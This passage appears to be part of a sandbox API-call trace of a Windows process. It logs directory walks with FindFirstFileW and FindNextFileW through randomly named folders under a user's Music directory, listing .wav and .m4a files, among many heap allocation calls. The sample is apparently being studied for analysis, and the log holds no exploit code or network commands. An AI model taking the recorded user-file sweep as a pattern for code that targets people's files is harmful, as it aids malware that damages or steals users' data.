lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 0 [0185.023] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0185.024] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.024] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\") returned="BJHxLX\\" [0185.024] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0185.024] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.024] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0185.024] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.024] PathFindFileNameW (pszPath="") returned="" [0185.024] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\*" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5a88c40, ftCreationTime.dwHighDateTime=0x1d89c6d, ftLastAccessTime.dwLowDateTime=0x6b678d10, ftLastAccessTime.dwHighDateTime=0x1d8a100, ftLastWriteTime.dwLowDateTime=0x6b678d10, ftLastWriteTime.dwHighDateTime=0x1d8a100, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5a88c40, ftCreationTime.dwHighDateTime=0x1d89c6d, ftLastAccessTime.dwLowDateTime=0x6b678d10, ftLastAccessTime.dwHighDateTime=0x1d8a100, ftLastWriteTime.dwLowDateTime=0x6b678d10, ftLastWriteTime.dwHighDateTime=0x1d8a100, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb06c760, ftCreationTime.dwHighDateTime=0x1d8a306, ftLastAccessTime.dwLowDateTime=0xf64f3330, ftLastAccessTime.dwHighDateTime=0x1d8a572, ftLastWriteTime.dwLowDateTime=0xf64f3330, ftLastWriteTime.dwHighDateTime=0x1d8a572, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9AsT-P", cAlternateFileName="")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e68cb00, ftCreationTime.dwHighDateTime=0x1d89ab1, ftLastAccessTime.dwLowDateTime=0x5ae9c5d0, ftLastAccessTime.dwHighDateTime=0x1d89bdc, ftLastWriteTime.dwLowDateTime=0x5ae9c5d0, ftLastWriteTime.dwHighDateTime=0x1d89bdc, nFileSizeHigh=0x0, nFileSizeLow=0x16df0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmBSppsTLRb9u.m4a", cAlternateFileName="CMBSPP~1.M4A")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ccce850, ftCreationTime.dwHighDateTime=0x1d89af2, ftLastAccessTime.dwLowDateTime=0xd1b72e60, ftLastAccessTime.dwHighDateTime=0x1d8a20c, ftLastWriteTime.dwLowDateTime=0xd1b72e60, ftLastWriteTime.dwHighDateTime=0x1d8a20c, nFileSizeHigh=0x0, nFileSizeLow=0x116e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dTVoZ bX824b.wav", cAlternateFileName="DTVOZB~1.WAV")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66735d90, ftCreationTime.dwHighDateTime=0x1d8984d, ftLastAccessTime.dwLowDateTime=0x556e4290, ftLastAccessTime.dwHighDateTime=0x1d8a2fb, ftLastWriteTime.dwLowDateTime=0x556e4290, ftLastWriteTime.dwHighDateTime=0x1d8a2fb, nFileSizeHigh=0x0, nFileSizeLow=0xdceb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FWxn.wav", cAlternateFileName="")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7555f830, ftCreationTime.dwHighDateTime=0x1d89a4c, ftLastAccessTime.dwLowDateTime=0xd4eeb0, ftLastAccessTime.dwHighDateTime=0x1d8a485, ftLastWriteTime.dwLowDateTime=0xd4eeb0, ftLastWriteTime.dwHighDateTime=0x1d8a485, nFileSizeHigh=0x0, nFileSizeLow=0x1438a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KnG7feMIAKlEoa_UW1s2.wav", cAlternateFileName="KNG7FE~1.WAV")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46289bb0, ftCreationTime.dwHighDateTime=0x1d8987d, ftLastAccessTime.dwLowDateTime=0xe60c5980, ftLastAccessTime.dwHighDateTime=0x1d8a1f8, ftLastWriteTime.dwLowDateTime=0xe60c5980, ftLastWriteTime.dwHighDateTime=0x1d8a1f8, nFileSizeHigh=0x0, nFileSizeLow=0x51cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rbnh H.wav", cAlternateFileName="RBNHH~1.WAV")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffece30, ftCreationTime.dwHighDateTime=0x1d89a0a, ftLastAccessTime.dwLowDateTime=0x689408f0, ftLastAccessTime.dwHighDateTime=0x1d8a4a9, ftLastWriteTime.dwLowDateTime=0x689408f0, ftLastWriteTime.dwHighDateTime=0x1d8a4a9, nFileSizeHigh=0x0, nFileSizeLow=0x300b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rp0gg8vJq4U.wav", cAlternateFileName="RP0GG8~1.WAV")) returned 1 [0185.027] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffece30, ftCreationTime.dwHighDateTime=0x1d89a0a, ftLastAccessTime.dwLowDateTime=0x689408f0, ftLastAccessTime.dwHighDateTime=0x1d8a4a9, ftLastWriteTime.dwLowDateTime=0x689408f0, ftLastWriteTime.dwHighDateTime=0x1d8a4a9, nFileSizeHigh=0x0, nFileSizeLow=0x300b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rp0gg8vJq4U.wav", cAlternateFileName="RP0GG8~1.WAV")) returned 0 [0185.027] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0185.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0185.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0185.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa28 [0185.028] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0185.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.029] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0185.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0185.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0185.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.034] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0185.034] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0185.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.035] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.035] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0185.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.036] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.036] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.037] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.037] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0185.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0185.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.039] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.039] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.040] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.041] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0185.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0185.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.045] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0185.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0185.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.046] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0185.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.047] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0185.047] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0185.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0185.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0185.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0185.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0185.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0185.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0185.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0185.053] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\") returned="mXrqWFqcp\\" [0185.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0185.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0185.053] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0185.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0185.053] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0185.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0185.053] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0185.053] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0185.053] PathFindFileNameW (pszPath="") returned="" [0185.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0185.053] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\*" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fd1d620, ftCreationTime.dwHighDateTime=0x1d897df, ftLastAccessTime.dwLowDateTime=0x9cde2fd0, ftLastAccessTime.dwHighDateTime=0x1d8a22b, ftLastWriteTime.dwLowDateTime=0x9cde2fd0, ftLastWriteTime.dwHighDateTime=0x1d8a22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0185.056] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fd1d620, ftCreationTime.dwHighDateTime=0x1d897df, ftLastAccessTime.dwLowDateTime=0x9cde2fd0, ftLastAccessTime.dwHighDateTime=0x1d8a22b, ftLastWriteTime.dwLowDateTime=0x9cde2fd0, ftLastWriteTime.dwHighDateTime=0x1d8a22b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.056] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf995c5f0, ftCreationTime.dwHighDateTime=0x1d8992d, ftLastAccessTime.dwLowDateTime=0x18829f0, ftLastAccessTime.dwHighDateTime=0x1d89db2, ftLastWriteTime.dwLowDateTime=0x18829f0, ftLastWriteTime.dwHighDateTime=0x1d89db2, nFileSizeHigh=0x0, nFileSizeLow=0xcbd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-xht.wav", cAlternateFileName="")) returned 1 [0185.056] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, 